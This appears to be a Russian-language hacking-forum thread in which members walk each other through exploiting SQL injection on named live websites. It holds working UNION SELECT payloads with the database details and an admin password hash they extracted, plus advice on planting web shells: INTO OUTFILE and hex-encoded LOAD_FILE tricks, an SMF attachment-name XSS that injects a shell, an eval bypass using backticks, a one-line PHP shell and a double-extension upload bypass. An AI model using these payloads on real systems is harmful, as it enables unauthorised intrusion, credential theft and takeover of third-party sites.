http://www.karjeroscentras.lt/lt.php/ieskantiems_darbo/darbo_skelbimai/darbo_skelbimai/347;f_ctitle;123'%20and%201=2%20union%20select%201 ,concat_ws(0x3a,user(),version(),database()),3,4,5 ,6,7,8%23

karjeroscentras@195.14.170.12:4.0.18:karjeroscentr as

Можно пытаться раскручивать дальше. Иньекция не слепая, показывает запрос и количество полей, короче, время провёл не зря. (Даже не подозревал, что так могу. :))
Если отдельные моменты будут непонятны - могу расписать, правда, не факт, что появлюсь тут до понедельника.

В любом случае, большое спасибо за увлекательную задачу. :)

вытянул пароль из таблицы admin
711de2ca756942dc
что за шифрование не подскажете? не мускульная ль функция?

o3,14um похоже это обычный mysql

да, так оно и есть, 100% мускульная функция пасвод

помогите расскрутить скулю, я не шарю
домен пр5
http://web.ffos.hr/serv_file.php?file=-44'

помогите расскрутить скулю, я не шарю
домен пр5
http://web.ffos.hr/serv_file.php?file=-44'

http://web.ffos.hr/serv_file.php?file=-44+union+select+1,2,concat_ws(0x40,version(),user( ),database()),4,5,6,7,8/*
вывод 3и4....4-название файла..3 внутри файла...

Ну вот. Приехал :D ... Не пойму в чем ошибка:
Составляю: http://site.ru/?cat=103&id=1/**/order/**/by/**/100/*
Вылазит:
MySQL Error...
SQL Query: select * from fotocatalog where m_id = '0' and status != 'del' and p_id = '1/**/order/**/by/**/100/*' order by date desc limit -2575, 25
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-2575, 25' at line 1
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/***/***/***.ru/test.php on line 84
Перепробовал уже и /**/ и + и %20 , все одно и тоже вылазит. Также пробовал and и другие - в результате 0...

*призадумался :confused: :confused: :confused:

2usakid параметр предыдуший ковычкой закрой у тебя запрос просто кривоватый получаеться ! ;)

USAkid

http://site.ru/?cat=103&id=1'/**/order/**/by/**/100/*

В теме Уязвимости SMF (http://forum.antichat.ru/thread46567.html) (во втором сообщении)
XSS
Отсутствует фильтрация atachment filename
-------------------------
Получение web shell'a
нужно создать сообщение и прикрепить файл с именем "name<img src=...."

и загружается .js скрипт

Это код простейшего динамического загрузчика скриптов http://site.com/smfexp.js - адрес загружаемого скрипта smfexp.js изменяет шаблон default темы: вставляет в /smf/Themes/default/index.php shell
-------
Этот скрипт изменять надо или шел появится сразу как я напишу сообщение ?

есть такая конструкция в скрипте

eval(stripslashes($_GET['var']));


проблема: при запросе фильтруется использование сразу двух скобок, " и \
каким метод получиться залить шелл, если вообще получится?

стрипслэш не фильтрует ковычки `
а если сделать такой запрос:

echo с такими ковычками, то получится тоже самое что и system()

пример:
echo `ls -la`;
ещё пример:
<?php
$s = "echo `dir`;";
eval(stripslashes($s));

?>

===

2geforse
шелл загрузится если админ попадёт на страницу с правильно сформатированным запросом, если я прально понял о чём ты

o3,14um
ясно, спасибо
буду тестить на локалхосте = )

echo с такими ковычками, то получится тоже самое что и system()

вернее это то же самое что shell_exec() ;)

как узнать сайт хостится на виндовом или линуксовом сервере?

по заголовку ответа web-сервера
по сервисам на других портах
в крайнем случае nmap может помочь

есть форум vBulletin Version 3.6.3, если ввести forum.site.ru/install/, то вылезает ошибка 500 Internal Server Error
------
ввожу forum.site.ru/installllllll/, вылезает 404 Not Found
----------------------------
тоесть папка install существует ?

2geforse Ты таки прав она есть ;) попробуй указать сразу путь к файлу установки forum.site.ru/install/install.php

Не кто случаем не подскажет где можно прочитать про методы реализации атак на Повреждение памяти апапча ?

0_o

:d wasm.ru

угу понял спс ;)

Простите за глупый вопрос, как нужно заливать шелл,когда у меня есть:
1)root-права
2)c://www/www/index.php (знаю путь)
3)ну естественно File_priv=Y
Как?.LOAD_FILE (можно посмотреть конфиги ,но не робит ,)но что-то не получаеться
Или как узнать префикс? (там самописный сайт,локалка) =\

Простите за глупый вопрос, как нужно заливать шелл,когда у меня есть:
1)root-права
2)c://www/www/index.php (знаю путь)
3)ну естественно File_priv=Y
Как?Я поню,что резе LOAD_FILE,но что-то не получаеться
http://forum.antichat.ru/thread80306-%F8%E5%EB%EB+%F7%E5%F0%E5%E7+sql.html

http://10.49.165.241/joke/index.php?sbcat_id=-34+union+select+1,2,3,4,5,6,7,8,9,10+from+mysql.us er--

вот... как залить шелл?
Сменя +8.

Уязвимость ли это? Как "Это" можно применить?

Fatal error: Uncaught exception 'Zend_Controller_Dispatcher_Exception' with message 'Invalid controller specified (vceos)' in /usr/local/www/***.by_new/library/Zend/Controller/Dispatcher/Standard.php:249 Stack trace: #0 /usr/local/www/***.by_new/library/Zend/Controller/Front.php(914): Zend_Controller_Dispatcher_Standard->dispatch(Object(Zend_Controller_Request_Http), Object(Zend_Controller_Response_Http)) #1 /usr/local/www/***.by_new/htdocs/index.php(81): Zend_Controller_Front->dispatch() #2 {main} thrown in /usr/local/www/***.by_new/library/Zend/Controller/Dispatcher/Standard.php on line 249

DDoSька Если речь идёт о заливке через инъекцию, то необходимо, что-бы ковычки не фильтровались. Если ты не можешь прочитать файл так:

LOAD_FILE('/etc/passwd')

А можешь так :

LOAD_FILE(0x2f6574632f706173737764)

то скорее всего magic_quotes_gpc = on,
и через INTO OUTFILE залить не получится.

PS Для любителей докопаться: Я видел что винда, /etc/passwd для примера :)

DDoSька Если речь идёт о заливке через инъекцию, то необходимо, что-бы ковычки не фильтровались. Если ты не можешь прочитать файл так:

LOAD_FILE('/etc/passwd')

А можешь так :

LOAD_FILE(0x2f6574632f706173737764)

то скорее всего magic_quotes_gpc = on,
и через INTO OUTFILE залить не получится.

PS Для любителей докопаться: Я видел что винда, /etc/passwd для примера :)
Фишка в том,что отклюбчен удаленный инклуд,
Warning: include() [function.include]: URL file-access is disabled in the server configuration
оцтой =\
Хотя если через бд выполнять не include.... а <? echo "lol"; ?> into.... то файл создаеться и все выполняеться,ДАЙТЕ самый маленький шелл плиз))
дайте самый маленький шелл))

DDoSька
<?php system($cmd) ?>

Опять я, опять Парюсь))
http://ua-foto.com/fotogal/:442%27/

День бюся результата ноль)

либо
http://ua-foto.com/eshop/121/0:226'/
он мне более нравица))

cms webo

При запросе:
http://ua-foto.com/eshop/121/0:226%20and%201=1%20order%20by%201/*

Уже надрываеца Unknown column '20and' in 'where clause'

tor4) , вроде ничего выкрутить нельзя)

там 2 запроса к БД

_http://ua-foto.com/eshop/143'
тут тоже скуля и раскрытие пути. может че-то накопаешь
а вот тут уже интереснее, нашёл:
_http://ua-foto.com/search/10/167/0/?&qs=&f[226]=&sf226=:3&sf447=-1)%20union%20select%201/*&f[447]=4&go=1&sort_type=1
перебрал и получил:
_http://ua-foto.com/search/10/167/0/?&qs=&f[226]=&sf226=:3&sf447=-1)%20UNION%20SELECT%201,2,3,4,5,6,7,8,concat_ws(0x 3a3a3a,version(),user(),database()),10,11,12,13,14 ,15,16,17,18,19,20,21,22/*&f[447]=4&go=1&sort_type=1

Поля вывода: 1,7,9,14. 9 самое нормально поле)

получили)
5.0.27:::uaphoto@localhost:::uaphoto

Похекал я админку на одном сайте, а там что бы загрузить файл на сервер можно использовать только скрипт загрузчика картинок
а в нем такой код присутствует

//File Name Check
if (( $file_name ==".jpg")||( $file_name ==".jpeg")||( $file_name ==".png")||( $file_name ==".gif"))
{
$message = "Invalid File Name Specified, be sure its a '.jpg'";
return $message;
}

и

//File Type Check
else if ( $file_type == "text/plain" ) {
$message = "Sorry, You cannot upload any script file" ;
return $message;
}

можно как то обойти эти фильтры?

.Striker, увидеть бы объявление $file_name.

А вообще попробуй назвать файл shell.jpg.php и майм-тайп смени.

пробовал загрузить обычную картинку оно не хочет :)
видимо они что то там накосячили